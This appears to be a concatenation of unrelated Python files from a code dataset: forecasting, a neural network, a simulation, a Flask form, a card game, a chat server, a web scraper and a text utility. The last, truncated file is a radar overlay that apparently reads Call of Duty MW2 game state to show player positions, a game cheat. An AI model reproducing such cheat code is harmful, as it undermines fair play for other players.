weekd:\n\t\t\t\tdatabase[hour][0].append(w[i])\n\t\t\t\tdatabase[hour][1].append(w[i+1])\n\t\t\tif week in noweekd:\n\t\t\t\tdatabase[hour+24][0].append(w[i])\n\t\t\t\tdatabase[hour+24][1].append(w[i+1])\n\tdatabase = np.array(database)\n\treturn database\n\ndef get_Least_squares_answer(A, Y):\n\treturn np.dot(np.dot((np.dot(A.T, A)).I, A.T), Y)\n\ndef del_col(dat,nozerocol):\n\tdat2 = np.zeros((dat.shape[0],len(nozerocol)))\n\tfor i in range(dat.shape[0]):\n\t\tfor j in range(len(nozerocol)):\n\t\t\tdat2[i][j] = dat[i][nozerocol[j]]\n\n\treturn dat2\n\ndef train(database, weekd, noweekd, k):\n\tTr = np.zeros((48,k,k))\n\tfor i in range(0,48):\n\t\tdbarray = np.array(database[i][0])\n\t\tzerocol = []\n\t\tnozerocol = []\n\t\tfor db1 in range(dbarray.shape[1]):\n\t\t\tshia = True\n\t\t\tfor db2 in range(dbarray.shape[0]):\n\t\t\t\tif dbarray[db2][db1]!=0:\n\t\t\t\t\tshia = False\n\t\t\tif shia:\n\t\t\t\tzerocol.append(db1)\n\t\t\telse:\n\t\t\t\tnozerocol.append(db1)\n\t\tdb = del_col(np.array(database[i][0]),nozerocol)\n\t\tdatabase[i][1] = del_col(np.array(database[i][1]),nozerocol)\n\t\tcount = 0\n\t\tfor j in range(db.shape[1]):\n\t\t\ty = []\n\t\t\tfor kl in range(database[i][1].shape[0]):\n\t\t\t\ty.append([database[i][1][kl][j]])\n\t\t\ty = np.mat(y)\n\t\t\tbeta = get_Least_squares_answer(np.mat(db),y)\n\t\t\tfor kl in range(db.shape[1]):\n\t\t\t\tTr[i][kl][nozerocol[j]] = beta[kl][0]\n\treturn Tr\n\n\ndef get_next_w(A,wone,tim,noweekd):\n\thour = int((tim-1475424000)/3600%24)\n\tweek = int(((tim-1475424000)/3600/24+1)%7)\n\tisnoweeked = 0\n\tif week in noweekd:\n\t\tisnoweeked = 24\n\treturn np.dot(wone,A[hour+isnoweeked])\n\ndef get_MAE(MA,True_MA):\n\tMAE = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tMAE += abs(True_MA[i]-MA[i])\n\tMAE = MAE / count\n\treturn MAE\n\ndef get_RMSE(MA,True_MA):\n\tRMSE = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tRMSE += math.pow(True_MA[i]-MA[i], 2)\n\tRMSE = math.sqrt(RMSE / count)\n\treturn RMSE\n\ndef get_ER(MA,True_MA):\n\tER = 0\n\tcount = 0\n\tfor i in range(MA.shape[0]):\n\t\tif True_MA[i]!=0:\n\t\t\tcount += 1\n\t\t\tER += abs(True_MA[i]-MA[i])\n\tER = ER / np.sum(True_MA)\n\treturn ER\n\n\n\n\ndef test(A,w,H,testset,testtime,wnew, weekd, noweekd, timestamp):\n\tforcast_ = np.zeros((testset.shape[0],testset.shape[1]))\n\tMAE = 0\n\tRMSE = 0\n\tER = 0\n\tresult = []\n\tfor i in range(24):\n\t\thour = int((testtime[i]-1475424000)/3600%24)\n\t\tweek = int(((testtime[i]-1475424000)/3600/24+1)%7)\n\t\tisnoweeked = 0\n\t\tif week in noweekd:\n\t\t\tisnoweeked = 24\n\t\trealtime = testtime[i]\n\t\twhile realtime not in timestamp:\n\t\t\trealtime = realtime - 3600\n\t\ttimeres = (testtime[i] - realtime) / 3600\n\t\tWlast = w[np.where(timestamp==realtime)]\n\t\tfor j in range(1,int(timeres)+1):\n\t\t\tWlast = get_next_w(A,Wlast,realtime+j*3600,noweekd)\n\t\twnew.append(Wlast)\n\t\tWHlast = np.dot(Wlast,H)\n\t\tforcast_[i] = WHlast\t\t\n\t\tresult.append([get_MAE(forcast_[i],testset[i]),get_RMSE(forcast_[i],testset[i]),get_ER(forcast_[i],testset[i])])\n\t\tprint('MAE:', result[-1][0], 'RMSE:', result[-1][1], 'ER:', result[-1][2])\n\tresult = np.array(result)\n\treturn wnew\n\nif __name__ == '__main__':\n\tweekd = [1,2,3,4,5]\n\tnoweekd = [6,0]\n\ttimestamp = np.load(\"./traindata/traintime.npy\")\n\tfirst_timestamp = timestamp[0]\n\tsample_num = len(timestamp)\n\t# w=np.load('./W0.npy')\n\t# H=np.load('./H0.npy')\n\n\tw = 
None\n\timport hdf5storage  # local import; required by the loadmat calls below\n\tw = hdf5storage.loadmat('./W1.mat')\n\tH = hdf5storage.loadmat('./H1.mat')\n\tw=w['S']\n\tH=H['B']\n\t#\n\tH = H.reshape(H.shape[0],-1)\n\tw = w.reshape(-1,w.shape[1])\n\t# print(w.min(),w.max(),w.mean(),w.std())\n\t# print(H.min(),H.max(),H.mean(),H.std())\n\tA=np.load('./A1.npy')\n\ttestset = np.load('./testdata_taxi/regulardata.npy')\n\tfirst_dim=testset.shape[0]\n\ttestset=testset.reshape(first_dim,-1)\n\ttesttime = np.load('./testdata_taxi/regulartime.npy')\n\twnew = []\n\twnew = test(A,w,H,testset,testtime,wnew,weekd,noweekd,timestamp)\n\twnew = np.array(wnew)\n\tnp.save('./testdata_taxi/wforecast5.npy',wnew)\n","sub_path":"Learn_transition_matrix.py","file_name":"Learn_transition_matrix.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"52426065","text":"\n## Random State for Reproducibility\nRAND_STATE = 42\n\n#######################\n### Imports\n#######################\n\n## External Libraries\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import (load_digits,\n                              load_breast_cancer)\nfrom sklearn.preprocessing import LabelBinarizer\nimport matplotlib.pyplot as plt\n\n#######################\n### Helpers\n#######################\n\ndef plot_nn_performance(scorer,\n                        costs_train,\n                        costs_test,\n                        scores_train,\n                        scores_test):\n    \"\"\"\n    Plot Cost and Model Predictive Performance over Epochs\n\n    Args:\n        scorer (sklearn metrics function): Scoring passed to fit() method\n        costs_train (list): Costs on training data\n        costs_test (list): Costs on test data\n        scores_train (list): Score on training data\n        scores_test (list): Score on test data\n    \n    Returns:\n        fig, ax (matplotlib objects): Figure\n    \"\"\"\n    ## Plot Performance\n    fig, ax = plt.subplots(1, 2, figsize = (10, 5.8), sharex = True)\n    for t, (tset, cost, score) in enumerate(zip([\"train\",\"test\"],\n                                                [costs_train, costs_test],\n                                                [scores_train, scores_test])):\n        epochs = np.arange(len(cost))\n        ax[0].plot(epochs, cost, label = tset, color = \"C{}\".format(t))\n        ax[1].plot(epochs, score, label = tset, color = \"C{}\".format(t))\n    ax[0].legend(loc = \"upper right\", frameon = True, facecolor = \"white\")\n    ax[1].legend(loc = \"lower right\", frameon = True, facecolor = \"white\")\n    for a in ax:\n        a.set_xlabel(\"Training Epoch\", fontsize = 12)\n    ax[0].set_ylabel(\"Cost\", fontsize = 12)\n    ax[1].set_ylabel(scorer.__name__.replace(\"_\",\" \").title(), fontsize = 12)\n    fig.tight_layout()\n    return fig, ax\n\n#######################\n### Neural Network Class Definition\n#######################\n\nclass NeuralNetwork(object):\n\n    def __init__(self,\n                 hidden_layers = [],\n                 max_epochs = 10000,\n                 lamb = 0.01,\n                 alpha = 1e-3,\n                 stopping_tol = 1e-10,\n                 random_state = None):\n        \"\"\"\n        Basic Implementation of a Neural Network\n\n        Init Args:\n            hidden_layers (list of int): Each index contains an integer representing the number of non-bias nodes.\n                                         Default is [], which will do p nodes, where p is the number of input\n                                         features\n            max_epochs (int): Maximum number of training epochs\n            lamb (float): Regularization parameter\n            alpha (float): Learning rate for gradient descent\n            stopping_tol (float): Minimum percent change in cost to keep training\n            random_state (int or None): Choose a random seed\n        \"\"\"\n        ## Class Architecture and Hyperparameters\n        self._hidden_layers = hidden_layers\n        self._lb = None\n        self._max_epochs = max_epochs\n        self._lamb = lamb\n        self._alpha = alpha\n        
self._stopping_tol = stopping_tol\n\n        ## Parameters et al. Working Space\n        self.s_ = None # Node sizes\n        self.m = None # No. of Training Samples\n        self.p = None # No. of features\n        self.k = None # No. of output nodes (positive classes)\n        self.theta_ = None # Weight matrices\n        self.z_ = None # Weighted outputs\n        self.a_ = None # Node activations\n        self.d_ = None # Node errors\n        self.D_ = None # Weighted Error\n        self.theta_grad_ = None # Gradients for theta\n        self.costs_ = None # Training Costs\n\n        ## Set Random State\n        if random_state is None:\n            random_state = np.random.randint(1, int(1e6))\n        np.random.seed(random_state)\n\n    def _sigmoid(self,\n                 x,\n                 deriv = False):\n        \"\"\"\n        Sigmoid function, and its derivative\n\n        Args:\n            x (numeric or array): Input value(s)\n            deriv (bool): If True, return x evaluated in the derivative of sigmoid. \n                          Otherwise, return x evaluated in the sigmoid itself\n        \n        Returns:\n            out (numeric or array): Sigmoid or Derivative of Sigmoid applied to x\n        \"\"\"\n        if deriv:\n            out = self._sigmoid(x) * (1 - self._sigmoid(x))\n        else:\n            out = 1 / (1 + np.exp(-x))\n        return out\n\n    def _compute_cost(self,\n                      h_x,\n                      y,\n                      gamma = 1e-10):\n        \"\"\"\n        Compute the cost, assuming sigmoid loss function\n\n        Args:\n            h_x (m x k array): Last layer, output probabilities (m samples, k classes)\n            y (m x k array): True labels, one-hot encoded (m samples, k classes)\n            gamma (float): Added to h_x to ensure no infs. Default is 1e-10\n        \n        Returns:\n            cost (float): Cost value\n        \"\"\"\n        m = y.shape[0]\n        cost = (1 / m) * ((-1) * y * np.log(h_x + gamma) - (1 - y)*np.log(1 - h_x + gamma)).sum() + \\\n               (self._lamb / (2 * m)) * sum([np.square(t[:,1:]).sum() for t in self.theta_])\n        return cost\n\n    def _encode_y(self,\n                  y):\n        \"\"\"\n        Create a one-hot encoding of classification targets\n\n        Args:\n            y (array): Target classes, can already be one-hot encoded\n        \n        Returns:\n            lb (sklearn LabelBinarizer): Transformer used to encode labels\n            y_oh (2d-array): One-hot encoding of input labels\n        \"\"\"\n        ## Initialize Label Encoder\n        lb = LabelBinarizer()\n        ## Fit and Transform\n        y_oh = lb.fit_transform(y)\n        ## Return\n        return lb, y_oh\n    \n    def _initialize_weights(self,\n                            X,\n                            y):\n        \"\"\"\n        Initialize Network Weights\n\n        Args:\n            X (array): Input feature matrix\n            y (2d-array): One-hot encoding of target classes\n        \n        Returns:\n            None (sets class parameters)\n        \"\"\"\n        ## Check Target Dimensionality\n        if len(y.shape) == 1:\n            raise ValueError(\"Expected y to be one-hot encoded target classes\")\n        ## Dimensionality Preparation\n        self.m, self.p = X.shape\n        self.k = y.shape[1]\n        if self.k == 2:\n            self.k = self.k - 1\n        if len(self._hidden_layers) == 0:\n            self._hidden_layers = [self.p]\n        self.s_ = [self.p] + self._hidden_layers + [self.k]\n        ## Initialize Weights, breaking Symmetry\n        self.theta_ = []\n        for s_j, s_j1 in zip(self.s_[:-1],self.s_[1:]):\n            s_dim = (s_j1, s_j + 1)\n            s_eps = np.sqrt(6) / np.sqrt(s_dim[0] + s_dim[1])\n            theta_s = (2 * np.random.random(size = s_dim) * s_eps) - s_eps\n            self.theta_.append(theta_s) \n\n    def _forward_propagation(self,\n                             X):\n        \"\"\"\n        Perform forward propagation using the current set of network weights self.theta_\n\n        Args:\n            X (2d-array): Feature matrix\n        \n        Returns:\n            z_ (list of array): Weighted sums for layer\n            a_ (list of array): Activations, with additional bias unit \n        \"\"\"\n        ## Sample Size\n        m = X.shape[0]\n        ## Set Activation Caches\n        z_ = []\n        a_ = []\n        ## Initialize \n        a_.append(np.hstack([np.ones((m, 1)), X]))\n        ## Propagate Values\n        for l, theta_l in 
enumerate(self.theta_):\n z_l = np.matmul(theta_l, a_[-1].T).T\n a_l = self._sigmoid(z_l)\n if l != len(self.theta_) - 1:\n a_l = np.hstack([np.ones((m, 1)), a_l])\n z_.append(z_l)\n a_.append(a_l)\n return z_, a_\n \n def _back_propagation(self,\n z_,\n a_,\n y):\n \"\"\"\n Perform backpropagation\n\n Args:\n z_ (list of array): Weighted sums at each layer pre-activation (excludes bias term)\n a_ (list of array): Activations at each layer (inclues bias term)\n y (2d-array): One-hot encoded true classes\n \n Returns:\n d_ (list of array): error terms\n D_ (list of array): partial derivatives, weighted by sample size\n theta_grad_ (list of array): gradients for each weight matrix \n \"\"\"\n ## Set Cache\n d_ = []\n D_ = []\n theta_grad_ = []\n ## Intialize\n d_.append(a_[-1] - y)\n ## Compute deltas\n for theta_l, z_l in zip(self.theta_[::-1][:-1], z_[::-1][1:]):\n d_l = np.matmul(theta_l[:, 1:].T, d_[-1].T).T * self._sigmoid(z_l, True)\n d_.append(d_l)\n ## Compute Deltas\n for d_l, a_l in zip(d_[::-1], a_[:-1]):\n D_l = np.matmul(d_l.T, a_l)\n D_.append(D_l)\n ## Compute Gradients\n def add_regularization(theta,\n m):\n \"\"\"\n Add Regularization to Gradient, Ignoring Bias Params\n\n Args:\n theta (2d-array): Weight Matrix\n m (int): Number of samples\n \n Returns:\n regularizer * theta (2d-array): Regularized weights (ignoring bias)\n \"\"\"\n regularizer = np.ones((theta.shape[1], 1, ))\n regularizer[0, 0] = 0\n regularizer *= (self._lamb/m)\n return np.multiply(regularizer, theta.T).T\n for D_l, theta_l in zip(D_, self.theta_):\n theta_l_grad = (1/self.m) * D_l + add_regularization(theta_l, self.m)\n theta_grad_.append(theta_l_grad)\n ## Return\n return d_, D_, theta_grad_\n\n def fit(self,\n X,\n y,\n X_validation = None,\n y_validation = None,\n scorer = metrics.accuracy_score):\n \"\"\"\n Fit a neural network using backpropagation and gradient descent.\n \n Note: If passing a roc_auc_score for scorer and performing multi-class classification,\n performance cache will contain class-level AUC scores at each epoch\n\n Args:\n X (2d-array): Feature Matrix\n y (array): Target classes\n \n Returns:\n self.costs_ (list): Cost computed at each training epoch\n scores (list): Model performance as a function of scorer at each training epoch\n costs_validation (list): Cost for validation dataset if passed, at each training epoch\n scores_validation (list): Model performance on validation dataset as a function of scorer\n at each training epoch\n \"\"\"\n ## One Hot Encoding of Y\n self._lb, y = self._encode_y(y)\n ## Initialize Weights\n self._initialize_weights(X, y)\n ## Model Performance\n self.costs_ = []\n scores = []\n costs_validation = []\n scores_validation = []\n ## Gradient Descent\n for e in tqdm(range(self._max_epochs),\n total = self._max_epochs,\n desc = \"Gradient Descent Epoch\",\n leave = True,\n position = 0):\n ## Forward Propagation\n self.z_, self.a_ = self._forward_propagation(X)\n ## Compute Costs and Other Performance Measures\n self.costs_.append(self._compute_cost(h_x = self.a_[-1], y = y))\n if scorer.__name__ != \"roc_auc_score\":\n scores.append(scorer(self._lb.inverse_transform(y), self.predict(X)))\n else:\n if self.k == 1:\n scores.append(scorer(self._lb.inverse_transform(y), self.predict_proba(X)))\n else:\n h_x_train = self.predict_proba(X)\n scores.append([scorer(y[:,i], h_x_train[:,i]) for i in range(y.shape[1])])\n if X_validation is not None and y_validation is not None:\n costs_validation.append(self._compute_cost(h_x = 
self.predict_proba(X_validation),\n                                                           y = self._lb.transform(y_validation)))\n                if scorer.__name__ != \"roc_auc_score\":\n                    scores_validation.append(scorer(y_validation, self.predict(X_validation)))\n                else:\n                    if self.k == 1:\n                        scores_validation.append(scorer(y_validation, self.predict_proba(X_validation)))\n                    else:\n                        h_x_validation = self.predict_proba(X_validation)\n                        scores_validation.append([scorer(self._lb.transform(y_validation)[:,i],\n                                                         h_x_validation[:,i]) for i in range(y.shape[1])])\n\n            ## Check Stopping Criteria\n            if e > 0 and ((self.costs_[-2] - self.costs_[-1])/self.costs_[-2]) < self._stopping_tol:\n                print(\"Stopping Criteria Reached. Breaking at Epoch {}\".format(e+1))\n                break\n            ## Backpropagation\n            self.d_, self.D_, self.theta_grad_ = self._back_propagation(z_ = self.z_,\n                                                                        a_ = self.a_,\n                                                                        y = y)\n            ## Update Theta (Gradient Descent Step)\n            for l in range(len(self.theta_)):\n                self.theta_[l] = self.theta_[l] - self._alpha * self.theta_grad_[l]\n        return self.costs_, scores, costs_validation, scores_validation\n    \n    def predict_proba(self,\n                      X):\n        \"\"\"\n        Make probability predictions\n\n        Args:\n            X (2d-array): Feature Matrix\n        \n        Returns:\n            h_x (2d-array): Output probabilities, last layer of network\n        \"\"\"\n        ## Check that the network has been fit\n        if self.theta_ is None:\n            raise ValueError(\"Network has not been fit yet. Please call .fit() method first.\")\n        ## Check that feature matrix dimensionality matches expected shape\n        if X.shape[1] + 1 != self.theta_[0].shape[1]:\n            raise ValueError(\"Expected {} features. Received {} in X.\".format(self.theta_[0].shape[1] - 1,\n                                                                              X.shape[1]))\n        ## Apply Forward Propagation\n        z_, a_ = self._forward_propagation(X)\n        h_x = a_[-1]\n        if self.k > 1:\n            h_x = h_x / h_x.sum(axis = 1, keepdims = True)\n        return h_x\n\n    def predict(self,\n                X):\n        \"\"\"\n        Make classifications\n\n        Args:\n            X (2d-array): Feature Matrix\n        \n        Returns:\n            h_x_argmax (1d-array): Class predictions, argmax of hypothesis\n        \"\"\"\n        ## Make Probability Predictions\n        h_x = self.predict_proba(X)\n        ## Get Classes (De-coded)\n        if self.k != 1:\n            h_x_argmax = self._lb.classes_[np.argmax(h_x, axis = 1)]\n        else:\n            h_x_argmax = (h_x >= 0.5).astype(int)\n        return h_x_argmax\n\n#######################\n### Example 1: Binary\n#######################\n\ndef train_binary_nn():\n    \"\"\"\n    Train a binary classification model (breast cancer prediction)\n    \"\"\"\n    ## Load Cancer Dataset\n    X, y = load_breast_cancer(return_X_y = True)\n    ## Split Data Set\n    X_train, X_test, y_train, y_test = train_test_split(X,\n                                                        y,\n                                                        test_size = 0.3,\n                                                        random_state = RAND_STATE)\n    ## Initialize and Parameterize Neural Network\n    nn_binary = NeuralNetwork(hidden_layers = [30],\n                              max_epochs = 10000,\n                              lamb = 0.01,\n                              alpha = 1e-4,\n                              stopping_tol = 1e-15,\n                              random_state = RAND_STATE)\n    ## Fit Model\n    scorer = metrics.accuracy_score\n    costs_train, scores_train, costs_test, scores_test = nn_binary.fit(X = X_train,\n                                                                       y = y_train,\n                                                                       X_validation = X_test,\n                                                                       y_validation = y_test,\n                                                                       scorer = scorer)\n    ## Plot Performance\n    fig, ax = plot_nn_performance(scorer,\n                                  costs_train,\n                                  costs_test,\n                                  scores_train,\n                                  scores_test)\n    plt.show()\n\n#######################\n### Example 2: Multi-class\n#######################\n\ndef train_multiclass_nn():\n    \"\"\"\n    Train a multi-class model (handwriting digit recognition)\n    \"\"\"\n    ## Load Digit Dataset\n    X, y = load_digits(n_class = 10,\n                       return_X_y = True)\n    ## Split Data Set\n    X_train, X_test, y_train, y_test = train_test_split(X,\n                                                        y,\n                                                        test_size = 0.3,\n                                                        random_state = RAND_STATE)\n    ## 
Initialize and Parameterize Neural Network\n    nn_multi = NeuralNetwork(hidden_layers = [100, 25],\n                             max_epochs = 10000,\n                             lamb = 0.01,\n                             alpha = 1e-3,\n                             stopping_tol = 1e-5,\n                             random_state = RAND_STATE)\n    ## Fit Model\n    scorer = metrics.accuracy_score\n    costs_train, scores_train, costs_test, scores_test = nn_multi.fit(X = X_train,\n                                                                      y = y_train,\n                                                                      X_validation = X_test,\n                                                                      y_validation = y_test,\n                                                                      scorer = scorer)\n    ## Plot Performance\n    fig, ax = plot_nn_performance(scorer,\n                                  costs_train,\n                                  costs_test,\n                                  scores_train,\n                                  scores_test)\n    plt.show()\n\n#######################\n### Executable Program\n#######################\n\ndef main():\n    \"\"\"\n    Executable Program\n    \"\"\"\n    ## Example 1: Binary\n    print(\"Training Binary Neural Network on Breast Cancer Dataset\")\n    train_binary_nn()\n    ## Example 2: Multi-class\n    print(\"Training Multi-class Neural Network on Digit Dataset\")\n    train_multiclass_nn()\n\nif __name__ == \"__main__\":\n    main()","sub_path":"week-4-5/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":19116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"401564638","text":"import simpy\n\nfrom src.car_model import Car, Driver, car\n\nenv = simpy.Environment()\n# car = Car(\"Ferrari\", env)\n# driver = Driver(env, car)\n\ncharge_station = simpy.Resource(env, capacity=2)\nfor i in range(4):\n    env.process(car('Car {}'.format(i), env, charge_station, i * 2, 5))\n\nenv.run(until=15)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"77426415","text":"from flask_wtf import FlaskForm\nfrom wtforms.fields import (\n    StringField,\n    SelectField,\n)\nfrom wtforms.validators import (\n    InputRequired,\n    Length,\n    ValidationError,\n)\n\n\nclass StatusForm(FlaskForm):\n    content = StringField(\n        validators=[\n            InputRequired(message=''),\n            Length(max=140, message='你的输入超出140个字符上限~'),\n        ],\n    )\n\n    is_public = SelectField(\n        choices=[\n            (1, '所有人可见'),\n            (0, '仅自己可见'),\n        ],\n        coerce=lambda x: bool(int(x)),\n        default=1,\n    )\n\n    def validate_content(self, content):\n        if not content.data.strip():\n            raise ValidationError('你输入的内容为空')\n","sub_path":"timeline/forms/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"272868178","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\nfrom fool_game import Cards,Player,Robot,Game\n\nresult = ''\nwinner = ''\ngame_run = 'y'\ncardg = []\nplayer_name = input(\"Введи своє ім'я:\").capitalize()\n\ni = 0\nwhile not player_name.isalpha():\n    player_name = input(\"Введи людське ім'я:\").capitalize()\n    if player_name.isalpha():\n        print(\"Привіт, %s =)\" % player_name)\n        break\n    if i == 2:\n        print(\"OK!Нехай, привіт %s =)\" % player_name)\n        break\n    i += 1\n\ndeck_game = Cards()\n\nwhile game_run == 'y':\n    print(\"Ок!Поїхали %s\" % player_name)\n    sleep(2)\n    ######## Start ########\n    # shuffle deck\n    deck = deck_game.shuffle_deck()\n    # make trump\n    trump = deck_game.make_trump()\n    # distribute cards to the players and take cards from the table\n    cards_player, cards_robot = deck_game.give_cards()\n    # define players\n    player = Player(deck,cards_player,trump)\n    robot = Robot(deck,cards_robot,trump)\n    # player sees cards and table\n    player.see_cards(deck,cards_player,trump)\n    # determine younger trump\n    trump_pla = 
player.see_trump(cards_player,trump)\n trump_rob = robot.see_trump(cards_robot,trump)\n # determine whose first step\n gamgam = Game(trump_pla,trump_rob,trump)\n step_player, step_robot = gamgam.trumping(trump_pla,trump_rob,trump)\n\n while len(cards_robot) > 0 and len(cards_player) > 0:\n if step_robot:\n cardg, cards_robot = robot.attack(cards_robot,trump)\n result, cards_player = player.defence(cardg,cards_player,trump)\n if result == 'beat' or result == 'beat_trump':\n step_robot = False\n step_player = True\n sleep(2)\n elif result == 'take':\n sleep(2)\n else:\n cardg, cards_player = player.attack(cards_player,trump)\n result, cards_robot = robot.defence(cardg,cards_robot,trump)\n if result == 'beat' or result == 'beat_trump':\n step_robot = True\n step_player = False\n sleep(2)\n elif result == 'take':\n print(\"Холєра!Я забираю..\")\n sleep(2)\n\n if len(deck) > 0:\n if step_player:\n cards_robot,deck = deck_game.take_card(cards_robot,deck)\n cards_player,deck = deck_game.take_card(cards_player,deck)\n else:\n cards_player,deck = deck_game.take_card(cards_player,deck)\n cards_robot,deck = deck_game.take_card(cards_robot,deck)\n cards_robot.sort()\n cards_player.sort()\n\n if len(cards_robot) > 0 and len(cards_player) > 0:\n player.see_cards(deck,cards_player,trump)\n elif len(cards_robot) == 0 and len(cards_player) == 0:\n winner = 'NO'\n break\n elif len(cards_robot) > 0 and len(cards_player) == 0:\n winner = 'You'\n break\n elif len(cards_robot) == 0 and len(cards_player) > 0:\n winner = 'Me'\n break\n\n if winner == 'Me':\n game_run = input(\"Я виграв! Граємо далі? 'y'/'n':\")\n elif winner == 'You':\n game_run = input(\"Вітаю %s!Ти виграв, граємо далі? 'y'/'n':\" % player_name)\n elif winner == 'NO':\n game_run = input(\"Нічия!!! Граємо далі? 
'y'/'n':\")\n\n if game_run.lower() != 'y' and game_run.lower() != 'n':\n game_run = 'y'\n elif game_run.lower() == 'n':\n print(\"Па-па, дякую за гру!\")\n","sub_path":"cards_classes/fool_start.py","file_name":"fool_start.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"625140884","text":"import asyncio\r\n\r\nclass Server(asyncio.Protocol):\r\n\r\n connections = {}\r\n\r\n @staticmethod\r\n def broadcast(data: bytes, user: str) -> None:\r\n for key in Server.connections.keys():\r\n if key != user:\r\n Server.connections[key].write(data)\r\n\r\n def __init__(self):\r\n self.user = None\r\n\r\n def connection_made(self, transport: asyncio.transports.BaseTransport) -> None:\r\n self.user = transport.get_extra_info('peername')[0] + str(transport.get_extra_info('peername')[1])\r\n Server.connections[self.user] = transport\r\n\r\n def data_received(self, data: bytes) -> None:\r\n if ':exit' in data.decode():\r\n Server.connections[self.user].close()\r\n Server.connections.pop(self.user)\r\n else:\r\n Server.broadcast(data, self.user)\r\n\r\n\r\nasync def main():\r\n loop = asyncio.get_running_loop()\r\n server = await loop.create_server(lambda: Server(), '127.0.0.1', 8888)\r\n\r\n async with server:\r\n await server.serve_forever()\r\n\r\n\r\nif __name__ == '__main__':\r\n asyncio.run(main())\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"489887415","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\ndef get_politician(party_id):\n url = \"http://www.assembly.go.kr/assm/memact/congressman/memCond/memCondListAjax.do\"\n value = {\n 's_poly_cd' : party_id,\n 'rowPerPage' : 300}\n data = urllib.parse.urlencode(value)\n full_url = url + '?' 
+ data\n\n response = requests.get(full_url)\n\n if response.encoding is None:\n response.encoding = 'utf-8'\n\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n\n if response.encoding is None: # 인코딩은 get(url)한 데이터를 해야함\n response.encoding = 'utf-8'\n\n for idx, politician in enumerate(soup.select('.memberna_list dl')):\n pol_list = []\n name = politician.dt.a.text\n image_url = politician.dd.a.img.get('src')\n pol_id = image_url.split('/')[2].split('.')[0]\n\n # pol_list.append(name)\n # pol_list.append(image_url)\n # pol_list.append(pol_id)\n # print(pol_list)\n\n print(idx, name, \"국회\", \"국회의원\", pol_id)\n\n # for info in soup.select('.mt'):\n # mt = info.text\n # print(mt)\n # break\n #\n # for info in soup.select('.ht'):\n # ht = info.text\n # print(ht)\n # break\n\nget_politician(101030)\n# 더민주 - 101182\n# 자유한국 - 101186\n# 국민의당 - 101183\n# 바른정당 - 101031\n# 정의당 - 101180\n# 무소속 - 101030\n","sub_path":"update_politician_list.py","file_name":"update_politician_list.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611093919","text":"def bordered(text):\n text = text.splitlines()\n maxlen = max(len(s) for s in text)\n colwidth = maxlen + 2\n res = \"\"\n res += '+' + '-'*colwidth + '+\\n'\n for s in text:\n res += '| %-*.*s |' % (maxlen, maxlen, s) + \"\\n\"\n res += '+' + '-'*colwidth + '+\\n'\n return res\n","sub_path":"recipes/Libraries/longy/prettyConsole.py","file_name":"prettyConsole.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"448683415","text":"from structs import VECTOR, ET_PLAYER, ET_TURRET, ET_HELICOPTER, ET_PLANE, ET_EXPLOSIVE, ALIVE_FLAG\r\nfrom Config import * #@UnusedWildImport\r\nfrom utils import draw_arrow, draw4\r\nfrom Keys import keys\r\nfrom math import radians\r\nfrom ctypes import byref, c_float\r\nfrom directx.d3d import D3DRECT, D3DCLEAR, RECT\r\nfrom directx.d3dx import d3dxdll, D3DXVECTOR2, D3DMATRIX\r\n\r\n\r\nclass Radar(object):\r\n \r\n def __init__(self, env):\r\n self.env = env\r\n self.rx = 0\r\n self.ry = 0\r\n self.rh = 0\r\n self.rw = 0\r\n \r\n def render(self):\r\n read_game = self.env.read_game\r\n frame = self.env.frame\r\n textures = self.env.textures\r\n\r\n if not read_game.is_in_game or not keys[\"KEY_RADAR\"]: return\r\n \r\n rx = self.rx = int(read_game.resolution_x/2 - RADAR_SIZE/2 + RADAR_CENTER_X)\r\n ry = self.ry = RADAR_OFFSET\r\n rh = rw = self.rh = self.rw = RADAR_SIZE\r\n \r\n scaling = 0.5 # TODO\r\n \r\n pos = read_game.mw2_mypos\r\n \r\n map_name = read_game.map_name # name of the current map\r\n p_matrix = textures.matrix[map_name] # transformation matrix (scale + rotation)\r\n transl = textures.translations[map_name] # translation vector to correct with map origin\r\n map_pos = VECTOR() # contains the coord on the map (with applied scaling)\r\n map_pos.x = scaling * (transl[0] + p_matrix[0]*pos.x + p_matrix[1]*pos.y)\r\n map_pos.y = scaling * (transl[1] + p_matrix[2]*pos.x + p_matrix[3]*pos.y)\r\n arrow_angle = textures.angle[map_name] # offset to apply to angles (only in estate)s\r\n arrow_inversion = textures.angle_inversion[map_name]\r\n \r\n sprite_center = D3DXVECTOR2(map_pos.x, map_pos.y)\r\n trans = D3DXVECTOR2(rx + rw/2 - map_pos.x, ry + rh/2 - map_pos.y) # global translation\r\n #print \"x=%.2f y=%.2f\" % (new_pos.x, new_pos.y )\r\n angle = radians(read_game.view_angles.y - arrow_angle)\r\n \r\n 
